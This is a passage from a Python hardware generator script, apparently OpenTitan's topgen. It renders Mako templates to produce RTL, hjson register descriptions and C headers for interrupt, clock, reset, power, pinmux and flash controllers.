hjson_tpl = Template(fin.read())
try:
out = hjson_tpl.render(n_alerts=n_alerts,
esc_cnt_dw=esc_cnt_dw,
accu_cnt_dw=accu_cnt_dw,
async_on=async_on,
n_classes=n_classes)
except: # noqa: E722
log.error(exceptions.text_error_template().render())
log.info("alert_handler hjson: %s" % out)
if out == "":
log.error("Cannot generate alert_handler config file")
return
hjson_gen_path = doc_path / "alert_handler.hjson"
gencmd = (
"// util/topgen.py -t hw/top_{topname}/data/top_{topname}.hjson --alert-handler-only "
"-o hw/top_{topname}/\n\n".format(topname=topname))
with hjson_gen_path.open(mode='w', encoding='UTF-8') as fout:
fout.write(genhdr + gencmd + out)
# Generate register RTLs (currently using shell execute)
    # TODO: More secure way to generate RTL
gen_rtl.gen_rtl(IpBlock.from_text(out, [], str(hjson_gen_path)),
str(rtl_path))
def generate_plic(top, out_path):
topname = top["name"]
# Count number of interrupts
    # Interrupt source 0 is tied to 0 to conform to the RISC-V PLIC spec.
    # So the total number of interrupts is the number of entries in the list + 1
src = sum([x["width"] if "width" in x else 1
for x in top["interrupt"]]) + 1
# Target and priority: Currently fixed
target = int(top["num_cores"], 0) if "num_cores" in top else 1
prio = 3
# Define target path
# rtl: rv_plic.sv & rv_plic_reg_pkg.sv & rv_plic_reg_top.sv
# data: rv_plic.hjson
rtl_path = out_path / 'ip/rv_plic/rtl/autogen'
rtl_path.mkdir(parents=True, exist_ok=True)
doc_path = out_path / 'ip/rv_plic/data/autogen'
doc_path.mkdir(parents=True, exist_ok=True)
hjson_path = out_path / 'ip/rv_plic/data/autogen'
hjson_path.mkdir(parents=True, exist_ok=True)
    # The IP top module generation flow is not generalized as a script yet,
    # so topgen reads template files from the rv_plic directory directly.
    # Once the IP top generation tool lands in util/, it can be imported as a library.
tpl_path = Path(__file__).resolve().parent / '../hw/ip/rv_plic/data'
hjson_tpl_path = tpl_path / 'rv_plic.hjson.tpl'
rtl_tpl_path = tpl_path / 'rv_plic.sv.tpl'
# Generate Register Package and RTLs
out = StringIO()
with hjson_tpl_path.open(mode='r', encoding='UTF-8') as fin:
hjson_tpl = Template(fin.read())
try:
out = hjson_tpl.render(src=src, target=target, prio=prio)
except: # noqa: E722
log.error(exceptions.text_error_template().render())
log.info("RV_PLIC hjson: %s" % out)
if out == "":
log.error("Cannot generate interrupt controller config file")
return
hjson_gen_path = hjson_path / "rv_plic.hjson"
gencmd = (
"// util/topgen.py -t hw/top_{topname}/data/top_{topname}.hjson --plic-only "
"-o hw/top_{topname}/\n\n".format(topname=topname))
with hjson_gen_path.open(mode='w', encoding='UTF-8') as fout:
fout.write(genhdr + gencmd + out)
# Generate register RTLs (currently using shell execute)
# TODO: More secure way to generate RTL
gen_rtl.gen_rtl(IpBlock.from_text(out, [], str(hjson_gen_path)),
str(rtl_path))
# Generate RV_PLIC Top Module
with rtl_tpl_path.open(mode='r', encoding='UTF-8') as fin:
rtl_tpl = Template(fin.read())
try:
out = rtl_tpl.render(src=src, target=target, prio=prio)
except: # noqa: E722
log.error(exceptions.text_error_template().render())
log.info("RV_PLIC RTL: %s" % out)
if out == "":
log.error("Cannot generate interrupt controller RTL")
return
rtl_gen_path = rtl_path / "rv_plic.sv"
with rtl_gen_path.open(mode='w', encoding='UTF-8') as fout:
fout.write(genhdr + gencmd + out)
def generate_pinmux(top, out_path):
topname = top['name']
pinmux = top['pinmux']
# Generation without pinmux and pinout configuration is not supported.
assert 'pinmux' in top
assert 'pinout' in top
# Get number of wakeup detectors
if 'num_wkup_detect' in pinmux:
num_wkup_detect = pinmux['num_wkup_detect']
else:
num_wkup_detect = 1
if num_wkup_detect <= 0:
# TODO: add support for no wakeup counter case
        log.error('Topgen currently does not support generation of a top ' +
                  'without wakeup detectors.')
return
if 'wkup_cnt_width' in pinmux:
wkup_cnt_width = pinmux['wkup_cnt_width']
else:
wkup_cnt_width = 8
if wkup_cnt_width <= 1:
        log.error('Wakeup counter width must be greater than or equal to 2.')
return
# MIO Pads
n_mio_pads = pinmux['io_counts']['muxed']['pads']
# Total inputs/outputs
# Reuse the counts from the merge phase
n_mio_periph_in = (pinmux['io_counts']['muxed']['inouts'] +
pinmux['io_counts']['muxed']['inputs'])
n_mio_periph_out = (pinmux['io_counts']['muxed']['inouts'] +
pinmux['io_counts']['muxed']['outputs'])
n_dio_periph_in = (pinmux['io_counts']['dedicated']['inouts'] +
pinmux['io_counts']['dedicated']['inputs'])
n_dio_periph_out = (pinmux['io_counts']['dedicated']['inouts'] +
pinmux['io_counts']['dedicated']['outputs'])
n_dio_pads = (pinmux['io_counts']['dedicated']['inouts'] +
pinmux['io_counts']['dedicated']['inputs'] +
pinmux['io_counts']['dedicated']['outputs'])
# TODO: derive this value
attr_dw = 13
# Generation with zero MIO/DIO pads is currently not supported.
assert (n_mio_pads > 0)
assert (n_dio_pads > 0)
log.info('Generating pinmux with following info from hjson:')
log.info('attr_dw: %d' % attr_dw)
log.info('num_wkup_detect: %d' % num_wkup_detect)
log.info('wkup_cnt_width: %d' % wkup_cnt_width)
log.info('n_mio_periph_in: %d' % n_mio_periph_in)
log.info('n_mio_periph_out: %d' % n_mio_periph_out)
log.info('n_dio_periph_in: %d' % n_dio_periph_in)
log.info('n_dio_periph_out: %d' % n_dio_periph_out)
log.info('n_dio_pads: %d' % n_dio_pads)
# Target path
# rtl: pinmux_reg_pkg.sv & pinmux_reg_top.sv
# data: pinmux.hjson
rtl_path = out_path / 'ip/pinmux/rtl/autogen'
rtl_path.mkdir(parents=True, exist_ok=True)
data_path = out_path / 'ip/pinmux/data/autogen'
data_path.mkdir(parents=True, exist_ok=True)
# Template path
tpl_path = Path(
__file__).resolve().parent / '../hw/ip/pinmux/data/pinmux.hjson.tpl'
# Generate register package and RTLs
gencmd = ("// util/topgen.py -t hw/top_{topname}/data/top_{topname}.hjson "
"-o hw/top_{topname}/\n\n".format(topname=topname))
hjson_gen_path = data_path / "pinmux.hjson"
out = StringIO()
with tpl_path.open(mode='r', encoding='UTF-8') as fin:
hjson_tpl = Template(fin.read())
try:
out = hjson_tpl.render(
n_mio_periph_in=n_mio_periph_in,
n_mio_periph_out=n_mio_periph_out,
n_mio_pads=n_mio_pads,
# each DIO has in, out and oe wires
# some of these have to be tied off in the
# top, depending on the type.
n_dio_periph_in=n_dio_pads,
n_dio_periph_out=n_dio_pads,
n_dio_pads=n_dio_pads,
attr_dw=attr_dw,
n_wkup_detect=num_wkup_detect,
wkup_cnt_width=wkup_cnt_width
)
except: # noqa: E722
log.error(exceptions.text_error_template().render())
log.info("PINMUX HJSON: %s" % out)
if out == "":
log.error("Cannot generate pinmux HJSON")
return
with hjson_gen_path.open(mode='w', encoding='UTF-8') as fout:
fout.write(genhdr + gencmd + out)
gen_rtl.gen_rtl(IpBlock.from_text(out, [], str(hjson_gen_path)),
str(rtl_path))
def generate_clkmgr(top, cfg_path, out_path):
# Target paths
rtl_path = out_path / 'ip/clkmgr/rtl/autogen'
rtl_path.mkdir(parents=True, exist_ok=True)
data_path = out_path / 'ip/clkmgr/data/autogen'
data_path.mkdir(parents=True, exist_ok=True)
# Template paths
hjson_tpl = cfg_path / '../ip/clkmgr/data/clkmgr.hjson.tpl'
rtl_tpl = cfg_path / '../ip/clkmgr/data/clkmgr.sv.tpl'
pkg_tpl = cfg_path / '../ip/clkmgr/data/clkmgr_pkg.sv.tpl'
hjson_out = data_path / 'clkmgr.hjson'
rtl_out = rtl_path / 'clkmgr.sv'
pkg_out = rtl_path / 'clkmgr_pkg.sv'
tpls = [hjson_tpl, rtl_tpl, pkg_tpl]
outputs = [hjson_out, rtl_out, pkg_out]
names = ['clkmgr.hjson', 'clkmgr.sv', 'clkmgr_pkg.sv']
# clock classification
grps = top['clocks']['groups']
ft_clks = OrderedDict()
rg_clks = OrderedDict()
sw_clks = OrderedDict()
src_aon_attr = OrderedDict()
hint_clks = OrderedDict()
# construct a dictionary of the aon attribute for easier lookup
# ie, src_name_A: True, src_name_B: False
for src in top['clocks']['srcs'] + top['clocks']['derived_srcs']:
if src['aon'] == 'yes':
src_aon_attr[src['name']] = True
else:
src_aon_attr[src['name']] = False
rg_srcs = [src for (src, attr) in src_aon_attr.items() if not attr]
    # Clocks fed through clkmgr but not disturbed in any way.
    # This maintains consistency of the clocking structure and
    # covers two groups of clocks:
    #   - clocks fed from the always-on source
    #   - clocks fed to the powerup group
ft_clks = OrderedDict([(clk, src) for grp in grps
for (clk, src) in grp['clocks'].items()
if src_aon_attr[src] or grp['name'] == 'powerup'])
# root-gate clocks
rg_clks = OrderedDict([(clk, src) for grp in grps
for (clk, src) in grp['clocks'].items()
if grp['name'] != 'powerup' and
grp['sw_cg'] == 'no' and not src_aon_attr[src]])
# direct sw control clocks
sw_clks = OrderedDict([(clk, src) for grp in grps
for (clk, src) in grp['clocks'].items()
if grp['sw_cg'] == 'yes' and not src_aon_attr[src]])
# sw hint clocks
hints = OrderedDict([(clk, src) for grp in grps
for (clk, src) in grp['clocks'].items()
if grp['sw_cg'] == 'hint' and not src_aon_attr[src]])
# hint clocks dict
for clk, src in hints.items():
# the clock is constructed as clk_{src_name}_{module_name}.
# so to get the module name we split from the right and pick the last entry
hint_clks[clk] = OrderedDict()
hint_clks[clk]['name'] = (clk.rsplit('_', 1)[-1])
hint_clks[clk]['src'] = src
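        # e.g. a clock named "clk_io_div4_aes" with src "io_div4" yields
        # {'name': 'aes', 'src': 'io_div4'} (names here are illustrative).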
for idx, tpl in enumerate(tpls):
out = ""
with tpl.open(mode='r', encoding='UTF-8') as fin:
tpl = Template(fin.read())
try:
out = tpl.render(cfg=top,
div_srcs=top['clocks']['derived_srcs'],
rg_srcs=rg_srcs,
ft_clks=ft_clks,
rg_clks=rg_clks,
sw_clks=sw_clks,
export_clks=top['exported_clks'],
hint_clks=hint_clks)
except: # noqa: E722
log.error(exceptions.text_error_template().render())
if out == "":
log.error("Cannot generate {}".format(names[idx]))
return
with outputs[idx].open(mode='w', encoding='UTF-8') as fout:
fout.write(genhdr + out)
# Generate reg files
gen_rtl.gen_rtl(IpBlock.from_path(str(hjson_out), []), str(rtl_path))
# generate pwrmgr
def generate_pwrmgr(top, out_path):
log.info("Generating pwrmgr")
# Count number of wakeups
n_wkups = len(top["wakeups"])
log.info("Found {} wakeup signals".format(n_wkups))
# Count number of reset requests
n_rstreqs = len(top["reset_requests"])
log.info("Found {} reset request signals".format(n_rstreqs))
if n_wkups < 1:
n_wkups = 1
log.warning(
"The design has no wakeup sources. Low power not supported")
# Define target path
rtl_path = out_path / 'ip/pwrmgr/rtl/autogen'
rtl_path.mkdir(parents=True, exist_ok=True)
doc_path = out_path / 'ip/pwrmgr/data/autogen'
doc_path.mkdir(parents=True, exist_ok=True)
    # Read template files directly from the pwrmgr ip directory.
tpl_path = Path(__file__).resolve().parent / '../hw/ip/pwrmgr/data'
hjson_tpl_path = tpl_path / 'pwrmgr.hjson.tpl'
# Render and write out hjson
out = StringIO()
with hjson_tpl_path.open(mode='r', encoding='UTF-8') as fin:
hjson_tpl = Template(fin.read())
try:
out = hjson_tpl.render(NumWkups=n_wkups,
Wkups=top["wakeups"],
NumRstReqs=n_rstreqs)
except: # noqa: E722
log.error(exceptions.text_error_template().render())
log.info("pwrmgr hjson: %s" % out)
if out == "":
log.error("Cannot generate pwrmgr config file")
return
hjson_path = doc_path / "pwrmgr.hjson"
with hjson_path.open(mode='w', encoding='UTF-8') as fout:
fout.write(genhdr + out)
# Generate reg files
gen_rtl.gen_rtl(IpBlock.from_path(str(hjson_path), []), str(rtl_path))
# generate rstmgr
def generate_rstmgr(topcfg, out_path):
log.info("Generating rstmgr")
# Define target path
rtl_path = out_path / 'ip/rstmgr/rtl/autogen'
rtl_path.mkdir(parents=True, exist_ok=True)
doc_path = out_path / 'ip/rstmgr/data/autogen'
doc_path.mkdir(parents=True, exist_ok=True)
tpl_path = Path(__file__).resolve().parent / '../hw/ip/rstmgr/data'
# Read template files from ip directory.
tpls = []
outputs = []
names = ['rstmgr.hjson', 'rstmgr.sv', 'rstmgr_pkg.sv']
for x in names:
tpls.append(tpl_path / Path(x + ".tpl"))
if "hjson" in x:
outputs.append(doc_path / Path(x))
else:
outputs.append(rtl_path / Path(x))
# Parameters needed for generation
clks = []
output_rsts = OrderedDict()
sw_rsts = OrderedDict()
leaf_rsts = OrderedDict()
# unique clocks
for rst in topcfg["resets"]["nodes"]:
if rst['type'] != "ext" and rst['clk'] not in clks:
clks.append(rst['clk'])
# resets sent to reset struct
output_rsts = [
rst for rst in topcfg["resets"]["nodes"] if rst['type'] == "top"
]
# sw controlled resets
sw_rsts = [
rst for rst in topcfg["resets"]["nodes"]
if 'sw' in rst and rst['sw'] == 1
]
# leaf resets
leaf_rsts = [rst for rst in topcfg["resets"]["nodes"] if rst['gen']]
log.info("output resets {}".format(output_rsts))
log.info("software resets {}".format(sw_rsts))
log.info("leaf resets {}".format(leaf_rsts))
# Number of reset requests
n_rstreqs = len(topcfg["reset_requests"])
# Generate templated files
for idx, t in enumerate(tpls):
out = StringIO()
with t.open(mode='r', encoding='UTF-8') as fin:
tpl = Template(fin.read())
try:
out = tpl.render(clks=clks,
power_domains=topcfg['power']['domains'],
num_rstreqs=n_rstreqs,
sw_rsts=sw_rsts,
output_rsts=output_rsts,
leaf_rsts=leaf_rsts,
export_rsts=topcfg['exported_rsts'])
except: # noqa: E722
log.error(exceptions.text_error_template().render())
if out == "":
log.error("Cannot generate {}".format(names[idx]))
return
with outputs[idx].open(mode='w', encoding='UTF-8') as fout:
fout.write(genhdr + out)
# Generate reg files
hjson_path = outputs[0]
gen_rtl.gen_rtl(IpBlock.from_path(str(hjson_path), []), str(rtl_path))
# generate flash
def generate_flash(topcfg, out_path):
log.info("Generating flash")
# Define target path
rtl_path = out_path / 'ip/flash_ctrl/rtl/autogen'
rtl_path.mkdir(parents=True, exist_ok=True)
doc_path = out_path / 'ip/flash_ctrl/data/autogen'
doc_path.mkdir(parents=True, exist_ok=True)
tpl_path = Path(__file__).resolve().parent / '../hw/ip/flash_ctrl/data'
# Read template files from ip directory.
tpls = []
outputs = []
names = ['flash_ctrl.hjson', 'flash_ctrl.sv', 'flash_ctrl_pkg.sv']
for x in names:
tpls.append(tpl_path / Path(x + ".tpl"))
if "hjson" in x:
outputs.append(doc_path / Path(x))
else:
outputs.append(rtl_path / Path(x))
# Parameters needed for generation
flash_mems = [mem for mem in topcfg['memory'] if mem['type'] == 'eflash']
if len(flash_mems) > 1:
log.error("This design does not currently support multiple flashes")
return
cfg = flash_mems[0]
# Generate templated files
for idx, t in enumerate(tpls):
out = StringIO()
with t.open(mode='r', encoding='UTF-8') as fin:
tpl = Template(fin.read())
try:
out = tpl.render(cfg=cfg)
except: # noqa: E722
log.error(exceptions.text_error_template().render())
if out == "":
log.error("Cannot generate {}".format(names[idx]))
return
with outputs[idx].open(mode='w', encoding='UTF-8') as fout:
fout.write(genhdr + out)
# Generate reg files
hjson_path = outputs[0]
gen_rtl.gen_rtl(IpBlock.from_path(str(hjson_path), []), str(rtl_path))
def generate_top_only(top_only_list, out_path, topname):
log.info("Generating top only modules")
for ip in top_only_list:
hjson_path = Path(__file__).resolve(
).parent / "../hw/top_{}/ip/{}/data/{}.hjson".format(topname, ip, ip)
genrtl_dir = out_path / "ip/{}/rtl".format(ip)
genrtl_dir.mkdir(parents=True, exist_ok=True)
log.info("Generating top modules {}, hjson: {}, output: {}".format(
ip, hjson_path, genrtl_dir))
# Generate reg files
gen_rtl.gen_rtl(IpBlock.from_path(str(hjson_path), []), str(genrtl_dir))
def generate_top_ral(top: Dict[str, object],
name_to_block: Dict[str, IpBlock],
dv_base_prefix: str,
out_path: str):
# construct top ral block
regwidth = int(top['datawidth'])
assert regwidth % 8 == 0
addrsep = regwidth // 8
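    # e.g. a 32-bit register width gives addrsep = 4, i.e. one register
    # every four bytes of address space.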
# Generate a map from instance name to the block that it instantiates,
# together with a map of interface addresses.
inst_to_block = {} # type: Dict[str, str]
    if_addrs = {}  # type: Dict[Tuple[str, Optional[str]], int]
attrs = {} # type: Dict[str, str]
for module in top['module']:
inst_name = module['name']
block_name = module['type']
block = name_to_block[block_name]
if "attr" in module:
if module["attr"] not in ['templated', 'reggen_top', 'reggen_only']:
raise ValueError('Unsupported value for attr field of {}: {!r}'
.format(inst_name, module["attr"]))
attrs[inst_name] = module["attr"]
inst_to_block[inst_name] = block_name
for if_name in block.reg_blocks.keys():
if_addr = int(module["base_addrs"][if_name], 0)
if_addrs[(inst_name, if_name)] = if_addr
# Collect up the memories to add
mems = []
for item in list(top.get("memory", [])):
byte_write = ('byte_write' in item and
item["byte_write"].lower() == "true")
data_intg_passthru = ('data_intg_passthru' in item and
item["data_intg_passthru"].lower() == "true")
size_in_bytes = int(item['size'], 0)
num_regs = size_in_bytes // addrsep
swaccess = access.SWAccess('top-level memory',
item.get('swaccess', 'rw'))
mems.append(window.Window(name=item['name'],
desc='(generated from top-level)',
unusual=False,
byte_write=byte_write,
data_intg_passthru=data_intg_passthru,
validbits=regwidth,
items=num_regs,
size_in_bytes=size_in_bytes,
offset=int(item["base_addr"], 0),
swaccess=swaccess))
chip = Top(regwidth, name_to_block, inst_to_block, if_addrs, mems, attrs)
# generate the top ral model with template
return gen_dv(chip, dv_base_prefix, str(out_path))
def _process_top(topcfg, args, cfg_path, out_path, pass_idx):
# Create generated list
# These modules are generated through topgen
generated_list = [
module['type'] for module in topcfg['module']
if lib.is_templated(module)
]
log.info("Filtered list is {}".format(generated_list))
# These modules are NOT generated but belong to a specific top
# and therefore not part of "hw/ip"
top_only_list = [
module['type'] for module in topcfg['module']
if lib.is_top_reggen(module)
]
log.info("Filtered list is {}".format(top_only_list))
topname = topcfg["name"]
# Sweep the IP directory and gather the config files
ip_dir = Path(__file__).parents[1] / 'hw/ip'
ips = search_ips(ip_dir)
    # Exclude filtered IPs (the top_${topname} versions are used instead).
exclude_list = generated_list + top_only_list
ips = [x for x in ips if not x.parents[1].name in exclude_list]
# Hack alert
# Generate clkmgr.hjson here so that it can be included below
# Unlike other generated hjsons, clkmgr thankfully does not require
# ip.hjson information. All the information is embedded within
# the top hjson file
amend_clocks(topcfg)
generate_clkmgr(topcfg, cfg_path, out_path)
# It may require two passes to check if the module is needed.
    # TODO: the first run of topgen will fail due to the absence of rv_plic.
    # It needs to run up to amend_interrupt in the merge_top function,
    # then create rv_plic.hjson, then run the xbar generation.
hjson_dir = Path(args.topcfg).parent
for ip in generated_list:
        # Modules generated prior to gathering are taken from the output
        # path; modules not generated yet may already exist in a
        # pre-defined area.
log.info("Appending {}".format(ip))
if ip == 'clkmgr' or (pass_idx > 0):
ip_hjson = Path(out_path) / "ip/{}/data/autogen/{}.hjson".format(
ip, ip)
else:
ip_hjson = hjson_dir.parent / "ip/{}/data/autogen/{}.hjson".format(
ip, ip)
ips.append(ip_hjson)
for ip in top_only_list:
log.info("Appending {}".format(ip))
ip_hjson = hjson_dir.parent / "ip/{}/data/{}.hjson".format(ip, ip)
ips.append(ip_hjson)
# load Hjson and pass validate from reggen
try:
ip_objs = []
for x in ips:
# Skip if it is not in the module list
if x.stem not in [ip["type"] for ip in topcfg["module"]]:
log.info("Skip module %s as it isn't in the top module list" %
x.stem)
continue
# The auto-generated hjson might not yet exist. It will be created
# later, see generate_{ip_name}() calls below. For the initial
# validation, use the template in hw/ip/{ip_name}/data .
if x.stem in generated_list and not x.is_file():
hjson_file = ip_dir / "{}/data/{}.hjson".format(x.stem, x.stem)
log.info(
"Auto-generated hjson %s does not yet exist. " % str(x) +
"Falling back to template %s for initial validation." %
str(hjson_file))
else:
hjson_file = x
ip_objs.append(IpBlock.from_path(str(hjson_file), []))
except ValueError:
raise SystemExit(sys.exc_info()[1])
# Read the crossbars under the top directory
xbar_objs = get_hjsonobj_xbars(hjson_dir)
log.info("Detected crossbars: %s" %
(", ".join([x["name"] for x in xbar_objs])))
# If specified, override the seed for random netlist constant computation.
if args.rnd_cnst_seed:
log.warning('Commandline override of rnd_cnst_seed with {}.'.format(
args.rnd_cnst_seed))
topcfg['rnd_cnst_seed'] = args.rnd_cnst_seed
# Otherwise, we either take it from the top_{topname}.hjson if present, or
# randomly generate a new seed if not.
else:
random.seed()
new_seed = random.getrandbits(64)
if topcfg.setdefault('rnd_cnst_seed', new_seed) == new_seed:
log.warning(
'No rnd_cnst_seed specified, setting to {}.'.format(new_seed))
topcfg, error = validate_top(topcfg, ip_objs, xbar_objs)
if error != 0:
raise SystemExit("Error occured while validating top.hjson")
name_to_block = {} # type: Dict[str, IpBlock]
for block in ip_objs:
lblock = block.name.lower()
assert lblock not in name_to_block
name_to_block[lblock] = block
completecfg = merge_top(topcfg, name_to_block, xbar_objs)
# Generate flash controller and flash memory
generate_flash(topcfg, out_path)
# Generate PLIC
if not args.no_plic and \
not args.alert_handler_only and \
not args.xbar_only:
generate_plic(completecfg, out_path)
if args.plic_only:
sys.exit()
# Generate Alert Handler
if not args.xbar_only:
generate_alert_handler(completecfg, out_path)
if args.alert_handler_only:
sys.exit()
# Generate Pinmux
generate_pinmux(completecfg, out_path)
# Generate Pwrmgr
generate_pwrmgr(completecfg, out_path)
# Generate rstmgr
generate_rstmgr(completecfg, out_path)
# Generate top only modules
# These modules are not templated, but are not in hw/ip
generate_top_only(top_only_list, out_path, topname)
if pass_idx > 0 and args.top_ral:
exit_code = generate_top_ral(completecfg, name_to_block,
args.dv_base_prefix, out_path)
sys.exit(exit_code)
return completecfg, name_to_block
def main():
parser = argparse.ArgumentParser(prog="topgen")
parser.add_argument('--topcfg',
'-t',
required=True,
help="`top_{name}.hjson` file.")
parser.add_argument(
'--outdir',
'-o',
help='''Target TOP directory.
Module is created under rtl/. (default: dir(topcfg)/..)
''') # yapf: disable
parser.add_argument('--verbose', '-v', action='store_true', help="Verbose")
    # Generator options: 'no' series. Cannot be combined with the 'only' series.
parser.add_argument(
'--no-top',
action='store_true',
help="If defined, topgen doesn't generate top_{name} RTLs.")
parser.add_argument(
'--no-xbar',
action='store_true',
help="If defined, topgen doesn't generate crossbar RTLs.")
parser.add_argument(
'--no-plic',
action='store_true',
help="If defined, topgen doesn't generate the interrup controller RTLs."
)
    # Generator options: 'only' series. Cannot be combined with the 'no' series.
parser.add_argument(
'--top-only',
action='store_true',
help="If defined, the tool generates top RTL only") # yapf:disable
parser.add_argument(
'--xbar-only',
action='store_true',
help="If defined, the tool generates crossbar RTLs only")
parser.add_argument(
'--plic-only',
action='store_true',
help="If defined, the tool generates RV_PLIC RTL and Hjson only")
parser.add_argument(
'--alert-handler-only',
action='store_true',
help="If defined, the tool generates alert handler hjson only")
# Generator options: generate dv ral model
parser.add_argument(
'--top_ral',
'-r',
default=False,
action='store_true',
help="If set, the tool generates top level RAL model for DV")
parser.add_argument('--dv-base-prefix',
default='dv_base',
help='Prefix for the DV register classes from which '
'the register models are derived.')
# Generator options for compile time random netlist constants
parser.add_argument(
'--rnd_cnst_seed',
type=int,
metavar='<seed>',
help='Custom seed for RNG to compute netlist constants.')
args = parser.parse_args()
# check combinations
if args.top_ral:
args.no_top = True
if (args.no_top or args.no_xbar or
args.no_plic) and (args.top_only or args.xbar_only or
args.plic_only or args.alert_handler_only):
        log.error(
            "'no' series options cannot be used with 'only' series options")
        raise SystemExit(1)
if args.verbose:
log.basicConfig(format="%(levelname)s: %(message)s", level=log.DEBUG)
else:
log.basicConfig(format="%(levelname)s: %(message)s")
if not args.outdir:
outdir = Path(args.topcfg).parent / ".."
log.info("TOP directory not given. Use %s", (outdir))
elif not Path(args.outdir).is_dir():
log.error("'--outdir' should point to writable directory")
raise SystemExit(sys.exc_info()[1])
else:
outdir = Path(args.outdir)
out_path = Path(outdir)
cfg_path = Path(args.topcfg).parents[1]
try:
with open(args.topcfg, 'r') as ftop:
topcfg = hjson.load(ftop,
use_decimal=True,
object_pairs_hook=OrderedDict)
except ValueError:
raise SystemExit(sys.exc_info()[1])
# TODO, long term, the levels of dependency should be automatically determined instead
# of hardcoded. The following are a few examples:
# Example 1: pinmux depends on amending all modules before calculating the correct number of
# pins.
# This would be 1 level of dependency and require 2 passes.
# Example 2: pinmux depends on amending all modules, and pwrmgr depends on pinmux generation to
# know correct number of wakeups. This would be 2 levels of dependency and require 3
# passes.
#
    # How does multi-pass work?
# In example 1, the first pass gathers all modules and merges them. However, the merge process
# uses a stale pinmux. The correct pinmux is then generated using the merged configuration. The
# second pass now merges all the correct modules (including the generated pinmux) and creates
# the final merged config.
#
# In example 2, the first pass gathers all modules and merges them. However, the merge process
# uses a stale pinmux and pwrmgr. The correct pinmux is then generated using the merged
# configuration. However, since pwrmgr is dependent on this new pinmux, it is still generated
# incorrectly. The second pass merge now has an updated pinmux but stale pwrmgr. The correct
# pwrmgr can now be generated. The final pass then merges all the correct modules and creates
# the final configuration.
#
# This fix is related to #2083
process_dependencies = 1
for pass_idx in range(process_dependencies + 1):
log.debug("Generation pass {}".format(pass_idx))
if pass_idx < process_dependencies:
cfg_copy = deepcopy(topcfg)
_process_top(cfg_copy, args, cfg_path, out_path, pass_idx)
else:
completecfg, name_to_block = _process_top(topcfg, args, cfg_path, out_path, pass_idx)
topname = topcfg["name"]
# Generate xbars
if not args.no_xbar or args.xbar_only:
generate_xbars(completecfg, out_path)
# All IPs are generated. Connect phase now
# Find {memory, module} <-> {xbar} connections first.
im.autoconnect(completecfg, name_to_block)
# Generic Inter-module connection
im.elab_intermodule(completecfg)
# Generate top.gen.hjson right before rendering
genhjson_dir = out_path / "data/autogen"
genhjson_dir.mkdir(parents=True, exist_ok=True)
genhjson_path = genhjson_dir / ("top_%s.gen.hjson" % completecfg["name"])
# Header for HJSON
gencmd = '''//
// util/topgen.py -t hw/top_{topname}/data/top_{topname}.hjson \\
// -o hw/top_{topname}/ \\
// --hjson-only \\
// --rnd_cnst_seed {seed}
'''.format(topname=topname, seed=completecfg['rnd_cnst_seed'])
genhjson_path.write_text(genhdr + gencmd +
hjson.dumps(completecfg, for_json=True))
if not args.no_top or args.top_only:
def render_template(template_path: str, rendered_path: Path, **other_info):
template_contents = generate_top(completecfg, name_to_block,
str(template_path), **other_info)
rendered_path.parent.mkdir(exist_ok=True, parents=True)
with rendered_path.open(mode='w', encoding='UTF-8') as fout:
fout.write(template_contents)
# Header for SV files
gencmd = warnhdr + '''//
// util/topgen.py -t hw/top_{topname}/data/top_{topname}.hjson \\
// -o hw/top_{topname}/ \\
// --rnd_cnst_seed {seed}
'''.format(topname=topname, seed=topcfg['rnd_cnst_seed'])
# SystemVerilog Top:
# 'toplevel.sv.tpl' -> 'rtl/autogen/top_{topname}.sv'
render_template(TOPGEN_TEMPLATE_PATH / "toplevel.sv.tpl",
out_path / f"rtl/autogen/top_{topname}.sv",
gencmd=gencmd)
# Multiple chip-levels (ASIC, FPGA, Verilator, etc)
for target in topcfg['targets']:
render_template(TOPGEN_TEMPLATE_PATH / "chiplevel.sv.tpl",
out_path / f"rtl/autogen/chip_{topname}_{target['name']}.sv",
gencmd=gencmd,
target=target)
# The C / SV file needs some complex information, so we initialize this
# object to store it.
c_helper = TopGenC(completecfg, name_to_block)
# 'toplevel_pkg.sv.tpl' -> 'rtl/autogen/top_{topname}_pkg.sv'
render_template(TOPGEN_TEMPLATE_PATH / "toplevel_pkg.sv.tpl",
out_path / f"rtl/autogen/top_{topname}_pkg.sv",
helper=c_helper,
gencmd=gencmd)
# compile-time random netlist constants
render_template(TOPGEN_TEMPLATE_PATH / "toplevel_rnd_cnst_pkg.sv.tpl",
out_path / f"rtl/autogen/top_{topname}_rnd_cnst_pkg.sv",
gencmd=gencmd)
# C Header + C File + Clang-format file
# Since SW does not use FuseSoC and instead expects those files always
# to be in hw/top_{topname}/sw/autogen, we currently create these files
# twice:
# - Once under out_path/sw/autogen
# - Once under hw/top_{topname}/sw/autogen
for path in [out_path.resolve(),
(SRCTREE_TOP / 'hw/top_{}/'.format(topname)).resolve()]:
# 'clang-format' -> 'sw/autogen/.clang-format'
cformat_tplpath = TOPGEN_TEMPLATE_PATH / 'clang-format'
cformat_dir = path / 'sw/autogen'
cformat_dir.mkdir(parents=True, exist_ok=True)
cformat_path = cformat_dir / '.clang-format'
cformat_path.write_text(cformat_tplpath.read_text())
# 'top_{topname}.h.tpl' -> 'sw/autogen/top_{topname}.h'
cheader_path = cformat_dir / f"top_{topname}.h"
render_template(TOPGEN_TEMPLATE_PATH / "toplevel.h.tpl",
cheader_path,
helper=c_helper)
# Save the relative header path into `c_gen_info`
rel_header_path = cheader_path.relative_to(path.parents[1])
c_helper.header_path = str(rel_header_path)
# 'toplevel.c.tpl' -> 'sw/autogen/top_{topname}.c'
render_template(TOPGEN_TEMPLATE_PATH / "toplevel.c.tpl",
cformat_dir / f"top_{topname}.c",
helper=c_helper)
# 'toplevel_memory.ld.tpl' -> 'sw/autogen/top_{topname}_memory.ld'
render_template(TOPGEN_TEMPLATE_PATH / "toplevel_memory.ld.tpl",
cformat_dir / f"top_{topname}_memory.ld")
# 'toplevel_memory.h.tpl' -> 'sw/autogen/top_{topname}_memory.h'
memory_cheader_path = cformat_dir / f"top_{topname}_memory.h"
render_template(TOPGEN_TEMPLATE_PATH / "toplevel_memory.h.tpl",
memory_cheader_path,
helper=c_helper)
try:
cheader_path.relative_to(SRCTREE_TOP)
except ValueError:
log.error("cheader_path %s is not within SRCTREE_TOP %s",
cheader_path, SRCTREE_TOP)
log.error("Thus skipping util/fix_include_guard.py")
continue
# Fix the C header guards, which will have the wrong name
subprocess.run(["util/fix_include_guard.py",
str(cheader_path),
str(memory_cheader_path)],
universal_newlines=True,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
check=True,
cwd=str(SRCTREE_TOP)) # yapf: disable
# generate chip level xbar and alert_handler TB
tb_files = [
